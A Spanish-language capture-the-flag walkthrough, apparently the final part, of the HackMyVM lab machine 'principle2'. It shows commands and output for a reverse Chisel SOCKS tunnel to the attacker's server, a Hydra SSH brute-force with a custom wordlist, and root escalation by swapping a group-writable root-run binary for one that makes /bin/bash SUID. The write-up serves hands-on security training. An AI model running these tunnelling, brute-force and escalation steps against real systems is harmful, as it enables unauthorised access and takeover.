tcp     LISTEN   0        50                  [::]:139               [::]:*      ino:17492 sk:27 cgroup:/system.slice/smbd.service v6only:1 <->                 
tcp     LISTEN   0        64                  [::]:2049              [::]:*      ino:16599 sk:28 cgroup:unreachable:7c6 v6only:1 <->                            
tcp     LISTEN   0        511                 [::]:80                [::]:*      ino:16649 sk:29 cgroup:/system.slice/nginx.service v6only:1 <->                
tcp     LISTEN   0        4096                [::]:111               [::]:*      ino:12781 sk:2a cgroup:/system.slice/rpcbind.socket v6only:1 <->     

Hemos detectado el puerto SSH de forma interna en el 345, así que vamos a tirar de Chisel para crear un túnel y atacar el SSH con un diccionario personalizado con la lista del principio con Hydra.

Podríamos utilizar un script de fuerza bruta para el comando “su” también, como, ya que quizá es lo más “lógico”.

En estos casos, como siempre subiremos el Chisel creando un servidor en Python y le daremos permisos de ejecución. Pero antes deberemos ejecutar en la máquina atacante: ./chisel server --reverse -p 1234. En este caso vamos a entablar un túnel proxy SOCKS.

Entonces ya sí ejecutamos en la máquina víctima:

hermanubis@principle2:~$ wget
--2023-11-29 00:12:41--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 8711104 (8.3M) [application/octet-stream]
Saving to: ‘chisel’

chisel              100%[===================>]   8.31M  --.-KB/s    in 0.05s   

2023-11-29 00:12:41 (170 MB/s) - ‘chisel’ saved [8711104/8711104]

hermanubis@principle2:~$ chmod +x chisel
hermanubis@principle2:~$ ./chisel client R:socks         
2023/11/29 01:00:22 client: Connecting to ws://
2023/11/29 01:00:22 client: Connected (Latency 360.938µs)

Fuerza bruta con Hydra

Con esto ya estamos conectados, ahora vamos a crear el diccionario y ejecutar el ataque:

sudo mount /home/kaian/labs/backups
[sudo] contraseña para kaian: 
❯ su pepito
$ bash
pepito@kali:/home/kaian/labs$ cat backups/*.txt >> /tmp/list
pepito@kali:/home/kaian/labs$ exit 
$ exit
❯ proxychains hydra -l melville -P /tmp/list -s 345 ssh -F 2>/dev/null
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra ( starting at 2023-11-29 02:07:49
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1001 login tries (l:1/p:1001), ~63 tries per task
[DATA] attacking ssh://
[345][ssh] host:   login: melville   password: 1XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXc
[STATUS] attack finished for (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra ( finished at 2023-11-29 02:08:09

Escalada de privilegios

Ya tenemos la contraseña, así que nos convertimos en Melville y continuamos:

melville@principle2:~$ find / -name *.timer 2>/dev/null

Ahí vemos un /etc/systemd/system/activity.timer que es algo raro, vamos a inspeccionarlo:

melville@principle2:~$ cat /etc/systemd/system/activity.timer


melville@principle2:~$ cat /etc/systemd/system/activity.service
Description=No description

melville@principle2:~$ ls -l /usr/local/share/report
-rwxrwx--- 1 root talos 16584 Nov 25 17:09 /usr/local/share/report
melville@principle2:~$ file /usr/local/share/report
/usr/local/share/report: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/, BuildID[sha1]=8b1c732db722b63be78e725a15d2968886f5a1d7, for GNU/Linux 3.2.0, not stripped
melville@principle2:~$ id
uid=1003(melville) gid=1003(melville) groups=1003(melville),1000(talos)

Bien, aquí tenemos la clave. Como podemos ver, ese servicio lo ejecuta root 10 min después de encenderse la máquina y después cada 2 minutos. El servicio ejecuta un script compilado, por lo que no podemos leerlo, pero tampoco nos hace falta. Como tenemos permisos de grupo con escritura de fichero vamos a intercambiarlo por uno nuestro.

Lo que haremos será crear un script que dé SUID a bash para convertirnos en root:


chmod u+s /bin/bash

Lo intercambiamos y nos ponemos a revisar hasta que se convierta en SUID:

melville@principle2:~$ cp report /usr/local/share/report
melville@principle2:~$ watch -n 1 ls -l /bin/bash

Cuando ya vemos -rwsr-xr-x 1 root root 1265648 Apr 23 2023 /bin/bash es hora de convertirnos en root:

melville@principle2:~$ bash -p
bash-5.2# cd /root
bash-5.2# ls
bash-5.2# cat root.txt


The flag is:

Y con esto máquina terminada, espero que la hayáis disfrutado. Cualquier duda o sugerencia podéis encontrarme en Discord oficial de HackMyVM o directamente en LinkedIn